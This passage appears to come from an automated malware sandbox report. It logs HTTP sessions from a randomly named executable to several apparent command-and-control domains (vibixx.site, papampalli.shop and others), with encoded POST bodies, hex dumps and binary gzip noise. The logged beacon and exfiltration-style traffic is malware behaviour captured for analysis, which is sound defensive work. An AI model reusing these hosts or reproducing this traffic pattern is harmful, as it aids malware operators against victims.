                                                                                                                                  Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  24192.168.2.450031167.172.133.32804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:31.558881044 CET336OUTGET /jlqg/?NBfdCRyH=8ZwuH3XLrsgkZOwzbHv8kzwaBJUvbtMyt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1siN23r0fyWsL1d4E8Hi4h+DwdtH5CMx58j2c=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.omnibizlux.biz
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:54:32.226411104 CET303INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.26.1
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:32 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 153
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  25192.168.2.450032162.0.211.143804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:37.375785112 CET591OUTPOST /4xim/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.vibixx.site
                                                                                                                                  Origin: http://www.vibixx.site
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.vibixx.site/4xim/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 35 59 55 76 49 6d 75 49 42 78 66 66 4e 4b 42 31 65 65 32 36 6d 68 76 61 4c 4b 61 52 79 46 30 4b 45 37 34 45 62 68 67 6b 63 35 2f 7a 66 53 72 50 31 79 39 65 4b 54 52 69 52 6c 34 53 64 56 4e 38 42 63 41 4f 39 56 6f 37 4b 62 4a 34 46 48 45 2b 52 37 54 61 35 38 6a 47 41 49 78 63 4f 54 4a 6c 6e 56 70 45 67 4c 38 67 2b 48 47 45 6f 49 6e 37 45 75 59 6e 67 4b 30 73 45 43 57 41 6e 69 69 46 4d 71 2b 73 61 38 5a 30 33 2f 64 4b 4e 76 55 6b 36 74 57 38 36 2b 61 68 53 6e 61 66 42 36 6e 66 2b 79 72 52 47 66 54 61 30 75 58 36 59 72 47 38 6a 59 51 6f 5a 51 33 56 35 73 76 70 37 30 33 32 70 41 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=5YUvImuIBxffNKB1ee26mhvaLKaRyF0KE74Ebhgkc5/zfSrP1y9eKTRiRl4SdVN8BcAO9Vo7KbJ4FHE+R7Ta58jGAIxcOTJlnVpEgL8g+HGEoIn7EuYngK0sECWAniiFMq+sa8Z03/dKNvUk6tW86+ahSnafB6nf+yrRGfTa0uX6YrG8jYQoZQ3V5svp7032pA==
                                                                                                                                  Nov 7, 2024 12:54:38.040174007 CET533INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:37 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  26192.168.2.450033162.0.211.143804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:39.916384935 CET611OUTPOST /4xim/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.vibixx.site
                                                                                                                                  Origin: http://www.vibixx.site
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.vibixx.site/4xim/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 35 59 55 76 49 6d 75 49 42 78 66 66 66 61 52 31 62 39 4f 36 71 52 76 5a 56 61 61 52 39 6c 30 57 45 37 30 45 62 67 30 30 41 62 62 7a 66 7a 62 50 32 32 4a 65 48 7a 52 69 65 46 34 58 5a 56 4e 69 42 63 38 38 39 52 30 37 4b 66 5a 34 46 47 30 2b 52 49 37 64 2f 73 6a 45 49 6f 78 65 4b 54 4a 6c 6e 56 70 45 67 4c 5a 37 2b 48 4f 45 6f 34 58 37 45 4d 77 6b 74 71 30 74 48 43 57 41 74 43 6a 4f 4d 71 2f 4c 61 39 46 65 33 38 6c 4b 4e 75 6b 6b 36 63 57 2f 77 2b 61 6a 66 48 62 2b 41 36 79 58 30 6e 61 39 41 4d 66 30 2b 64 36 43 51 4e 4c 6d 79 70 78 2f 4c 51 54 6d 6b 72 6d 64 32 33 4b 2f 79 4c 43 45 69 4a 52 38 5a 4f 46 43 49 69 42 56 65 62 62 44 77 7a 49 3d
                                                                                                                                  Data Ascii: NBfdCRyH=5YUvImuIBxfffaR1b9O6qRvZVaaR9l0WE70Ebg00AbbzfzbP22JeHzRieF4XZVNiBc889R07KfZ4FG0+RI7d/sjEIoxeKTJlnVpEgLZ7+HOEo4X7EMwktq0tHCWAtCjOMq/La9Fe38lKNukk6cW/w+ajfHb+A6yX0na9AMf0+d6CQNLmypx/LQTmkrmd23K/yLCEiJR8ZOFCIiBVebbDwzI=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  27192.168.2.450034162.0.211.143804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:42.461678028 CET10693OUTPOST /4xim/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.vibixx.site
                                                                                                                                  Origin: http://www.vibixx.site
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.vibixx.site/4xim/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 35 59 55 76 49 6d 75 49 42 78 66 66 66 61 52 31 62 39 4f 36 71 52 76 5a 56 61 61 52 39 6c 30 57 45 37 30 45 62 67 30 30 41 62 54 7a 66 41 54 50 30 58 4a 65 47 7a 52 69 58 6c 34 57 5a 56 4d 2b 42 63 6c 33 39 52 34 42 4b 5a 46 34 48 6b 4d 2b 58 35 37 64 78 73 6a 45 45 49 78 66 4f 54 49 78 6e 56 35 41 67 4c 4a 37 2b 48 4f 45 6f 36 50 37 4e 2b 59 6b 2b 61 30 73 45 43 57 55 6e 69 6a 6d 4d 71 33 78 61 39 42 6b 30 4e 46 4b 4e 4f 30 6b 68 4f 75 2f 38 2b 61 62 59 48 62 63 41 36 75 59 30 6d 79 48 41 50 44 65 2b 65 6d 43 54 6f 6e 37 75 73 52 6b 66 77 66 48 36 70 75 6f 37 77 36 48 2b 38 43 4c 6d 38 4a 77 41 76 31 74 48 7a 55 72 46 71 36 63 76 32 68 75 2b 56 34 5a 34 35 65 48 79 2f 50 33 79 2f 75 36 30 32 33 59 30 4c 41 30 65 66 6c 4b 71 31 63 59 42 67 58 38 41 6c 78 76 59 38 58 6e 4d 68 4f 47 51 62 2f 41 53 4e 38 2b 6d 70 67 4c 53 6b 53 37 6c 6c 52 63 67 70 74 54 31 7a 63 49 74 39 7a 2f 76 39 53 49 74 74 35 4e 49 6b 6d 6f 77 2f 71 4b 4b 6f 64 7a 74 77 65 48 31 64 47 76 61 37 57 6a 57 [TRUNCATED]
                                                                                                                                  Data Ascii: NBfdCRyH=5YUvImuIBxfffaR1b9O6qRvZVaaR9l0WE70Ebg00AbTzfATP0XJeGzRiXl4WZVM+Bcl39R4BKZF4HkM+X57dxsjEEIxfOTIxnV5AgLJ7+HOEo6P7N+Yk+a0sECWUnijmMq3xa9Bk0NFKNO0khOu/8+abYHbcA6uY0myHAPDe+emCTon7usRkfwfH6puo7w6H+8CLm8JwAv1tHzUrFq6cv2hu+V4Z45eHy/P3y/u6023Y0LA0eflKq1cYBgX8AlxvY8XnMhOGQb/ASN8+mpgLSkS7llRcgptT1zcIt9z/v9SItt5NIkmow/qKKodztweH1dGva7WjWX4Aq7VFvlufEx/Vr14Dnl8gS+GMPxanQA2ustm8Xw8A6tp5bvQ8r1x8j1cJMuzbQSrvlD9YYqPhNGdD8ahBc0/ED8eU1/5WFYsoIWL9+RabHHKQCf4v7RYHSHaMXXnXcT7DBmWF+uxWu9kkZYo/kJ6+S4DCwgIILxer3b8aqcKFvP/dd6O87Y5oUKwL00Tw3V+kJpbdS9oYpkNk+j4Ue7Zrj5XsjyvNlFeK1bDk/VU0G3xdOi55fMz7gpSvXPLo8bw4Ta2oELlfTbCKP+D2ymTChJ4vymdWQydDcRWQGLtVoCp1eukMfF9hlGn4XwcfSoJGJo7kT3/iDA5nbZlGcYu+0VNF2loZ78J0htnSiHjsJyQR9XRdXwLfjOPAUmsHK1vG1UIe0hVuv2S8uYqyjRBLnt73OR0V28F6GVVl4P6+/UnICbAADtcusCYuKN1tfaEyRz5+/JrfdjDHOe9Q2iio+rKdmzWPe+pDYXHwC/uwbgLQ/VnSME4f5o8ExQmGpcs5IbmL2GXTcP+IZTUlE2alXyumsWl12mFP1Ur23pYyUT/3HCgINjvNBTU6oFESFl5pcsHFG/qyahtLAQ45XHvM3vMT2q81EP6GMJcPnxizTBVU5jQn/MSsz2MlqjU9f1p2U0NAOFCVq4QQtHJDGlM1St1XI0mquOC [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:54:43.143553019 CET533INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:43 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  28192.168.2.450035162.0.211.143804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:45.132808924 CET333OUTGET /4xim/?NBfdCRyH=0a8PLTuVJQjPSrlNTcujtDihNMeO9FYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP27bmOOo50KzsRrW97hoYkm0aU0/aEWOIRhrI=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.vibixx.site
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:54:45.805418015 CET548INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:45 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  29192.168.2.450036162.241.85.94804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:59.451555967 CET603OUTPOST /pgru/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.papampalli.shop
                                                                                                                                  Origin: http://www.papampalli.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.papampalli.shop/pgru/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 78 79 62 50 4b 4a 46 76 79 41 32 4d 62 4e 31 55 64 53 47 67 72 59 7a 33 36 6e 63 4d 2f 6c 33 58 41 57 4f 2f 6b 59 44 58 63 45 66 4c 72 31 33 33 6b 50 63 4e 55 5a 45 34 4f 4a 6f 68 64 35 48 57 61 55 4d 44 74 47 31 6f 79 69 5a 6d 42 50 49 42 53 57 73 76 4f 4e 77 44 38 41 6e 2b 2b 34 4e 39 47 68 61 4a 74 71 57 6e 69 5a 4e 72 41 4d 64 2b 55 73 51 66 6c 34 67 69 55 52 56 55 34 61 54 52 61 79 4d 68 68 51 30 52 79 42 73 64 63 6f 79 58 59 6b 2f 59 4d 50 52 66 56 70 63 2f 61 42 68 6e 70 47 56 68 57 66 2b 46 2f 79 79 50 41 53 49 32 77 38 46 57 37 66 31 35 59 38 65 36 67 69 54 43 4b 77 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=xybPKJFvyA2MbN1UdSGgrYz36ncM/l3XAWO/kYDXcEfLr133kPcNUZE4OJohd5HWaUMDtG1oyiZmBPIBSWsvONwD8An++4N9GhaJtqWniZNrAMd+UsQfl4giURVU4aTRayMhhQ0RyBsdcoyXYk/YMPRfVpc/aBhnpGVhWf+F/yyPASI2w8FW7f15Y8e6giTCKw==
                                                                                                                                  Nov 7, 2024 12:55:00.338534117 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:00 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  Link: <https://papampalli.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Content-Length: 15115
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed b2 ed 96 e3 c6 b1 2d f8 bb b8 96 de 21 1b bd 5a 4d ca 04 08 f0 ab 58 e0 87 5a 96 ed 7b 7c d7 b1 e5 51 cb 73 ae 97 a4 e9 95 04 12 40 76 25 32 e1 cc 04 3f 1a ae 07 9a d7 98 27 9b c0 07 49 90 04 8b 54 77 cb 77 66 1d b1 8a 20 32 32 62 47 c4 de fb 6e f6 e2 0f df 7d fb c3 3f fe f6 47 14 e9 98 2d 5a 77 b3 fc 17 31 cc c3 b9 41 b8 f9 f7 b7 46 11 24 d8 87 df bb 59 4c 34 46 5e 84 a5 22 7a 6e fc fd 87 3f 99 13 03 f5 0e 57 1c c7 64 6e ac 28 59 27 42 6a 03 79 82 6b c2 21 75 4d 7d 1d cd 7d b2 a2 1e 31 8b 43 17 51 4e 35 c5 cc 54 1e 66 64 ee 18 05 0c a3 fc 11 49 c2 e6 46 22 45 40 19 31 50 24 49 30 37 22 ad 13 e5 f6 7a 61 9c 84 96 90 61 6f 13 f0 9e 53 55 69 aa 19 59 fc 0d 87 04 71 a1 51 20 52 ee a3 2f 5f 4e fa 8e 33 45 7f d9 a2 df 33 11 ce 7a 65 56 ab 36 ea 6b 29 96 42 ab d7 fb 41 5f c7 78 63 d2 18 80 cc 44 92 7c 11 97 61 19 92 d7 f9 96 87 e1 5e fb 5c e5 09 01 d1 5e f4 ba 9c f0 75 af 97 e0 04 c7 09 66 8c 5a 2a 12 c9 49 91 81 99 26 92 63 0d 3b e9 6d 02 44 e1 24 61 d4 c3 9a 0a de 93 4a [TRUNCATED]
                                                                                                                                  Data Ascii: -!ZMXZ{|Qs@v%2?'ITwwf 22bGn}?G-Zw1AF$YL4F^"zn?Wdn(Y'Bjyk!uM}}1CQN5TfdIF"E@1P$I07"zaaoSUiYqQ R/_N3E3zeV6k)BA_xcD|a^\^ufZ*I&c;mD$aJn3K)!)'z[W%P^VXhexK;oR]['&c{+$J6'X!Kq='v`R+430G}G;FWF=Pef$Bw9p,NFsx:I0Sk#u{k<I[JA6Bu=tE}WO0:_'`wZpT)eQ$)2%fqvd{Re)%C)Rq"\OJtQr|R?DG5Pg@R5),-fG$)oH`nDZ'U'SY7C~vT<m F@@?yR(%$)E\0CU8XS/<O_
                                                                                                                                  Nov 7, 2024 12:55:00.338557005 CET212INData Raw: 2f bc 3c 4a cd 4f 3b 07 9a 6b b1 36 31 a7 31 ce d9 2f 6d 75 ee 2a eb 28 3f 5b 51 45 97 94 51 bd 75 51 44 7d 9f f0 e9 d3 8e ef d6 5d 63 9b 6b b6 75 25 c8 9b 99 e6 a1 a2 10 17 f8 82 d1 e4 d6 7d 69 db f7 cb 20 98 9e 67 a8 9c 19 bf c8 19 7b f7 a3 7b
                                                                                                                                  Data Ascii: /<JO;k611/mu*(?[QEQuQD}]cku%}i g{{!'o>kyC}P<pKGo1WKyv>Q_rEX'M$1Z5$fT@'`>(HTTwu!C1g9l`B@
                                                                                                                                  Nov 7, 2024 12:55:00.338579893 CET1236INData Raw: bb 28 cf da 87 c0 9d d1 2e f6 d4 7a 13 13 9f 62 d4 8e e1 a6 82 b8 1f 3f 24 9b 4e d6 ba bb bb ab f5 03 b7 11 d3 27 ea 51 8b a4 b8 bb f3 a9 4a e0 ce 05 9b 13 f4 82 c6 89 90 1a 73 3d cd 2f 9f 5a f9 17 1e 7b fc c3 88 f7 e3 09 e0 23 cc fd a3 b6 23 db
                                                                                                                                  Data Ascii: (.zb?$N'QJs=/Z{##V%#uby?Xc"y?&r=7JpgtT(Lyl"XRF~EJZd)m*?n1#k1E?QN<;8qFK=!yY7+"iY\Ya8:YatBt
                                                                                                                                  Nov 7, 2024 12:55:00.338596106 CET1236INData Raw: 99 f8 91 fc 3c d7 6d dc 25 c0 48 de e0 c0 93 ce ef 73 8e f4 fc 6c 7a 58 92 26 1a c4 d2 96 92 de 1c 08 b5 80 44 22 e7 2f ec 2e b5 22 98 dc c2 49 42 b8 ff 6d 44 99 df d6 9d a7 26 9a ff 26 45 4c 15 90 db 16 73 63 9d fc 31 d7 fc 2d d1 9a f2 50 bd 4d
                                                                                                                                  Data Ascii: <m%HslzX&D"/."IBmD&&ELsc1-PMDHhsR<#+":{8qDsdSu<Z*M8mb03Pxj%_|t2-Ej%XB"J[-$I.5m{ic2x/,Mcv/
                                                                                                                                  Nov 7, 2024 12:55:00.338613987 CET1236INData Raw: 04 61 40 06 17 bd b4 8b 4f 73 8e b7 c5 1c 12 53 aa 22 33 94 78 0b e9 78 b9 9c 78 a7 03 56 e9 eb 88 6a a0 34 97 31 57 b2 31 27 c1 8c 98 09 98 37 cf bb 9f f8 f8 be 39 6f 45 57 d4 37 25 f1 21 cf 0b fa a4 4f 9a f3 58 1a 53 2e 52 55 15 80 6b 78 58 ce
                                                                                                                                  Data Ascii: a@OsS"3xxxVj41W1'79oEW7%!OXS.RUkxX0~ID%r#V ~{soON=R'eGv>N=]rA2;Ie!;>%\aZ03$p3]WyFa9s)u/o;>}{u
                                                                                                                                  Nov 7, 2024 12:55:00.338627100 CET636INData Raw: 51 79 c9 4d 09 e5 1f c7 c7 be fa a2 9a 92 f8 1f 85 bc af 6e 40 66 69 4c b9 48 77 2d 84 c4 3c fc 38 56 1a 91 ae 77 c4 f1 12 c0 3f 43 c3 02 a8 a9 1f 0d 23 0d 26 20 84 57 b6 f8 98 5e 27 20 17 35 fa c4 3e a7 20 97 5c b6 f3 f7 c7 49 75 0c 71 71 97 4f
                                                                                                                                  Data Ascii: QyMn@fiLHw-<8Vw?C#& W^' 5> \IuqqOkrqK}J-8nJSc(Ew_qKjOMs1"%0'q!1?_D-%?xM#rgo)':~T,O]c*!iIs4"6t`r$4]'8|~;
                                                                                                                                  Nov 7, 2024 12:55:00.338637114 CET1236INData Raw: 49 13 8d 94 f4 e6 c6 65 26 28 f7 58 ea 03 07 ef e1 ff 9f 29 91 db ea c7 8a 29 b7 de 97 2c 0c ac 7b cb 31 f2 fd 8c f2 12 08 94 c4 7c af 8c 05 b8 a8 e8 f3 e9 0d cd 98 86 12 bc 71 dc 78 78 d2 b8 4a fa b8 de 3b d9 13 96 86 94 83 ee 3b b1 f2 61 80 f8
                                                                                                                                  Data Ascii: Ie&(X)),{1|qxxJ;;a%.h-{DdbZkKgo{GgmBNF=)dJn3op(!1qBH8^4PE/!I[U_,gR(@4[b1"`Ki;#'
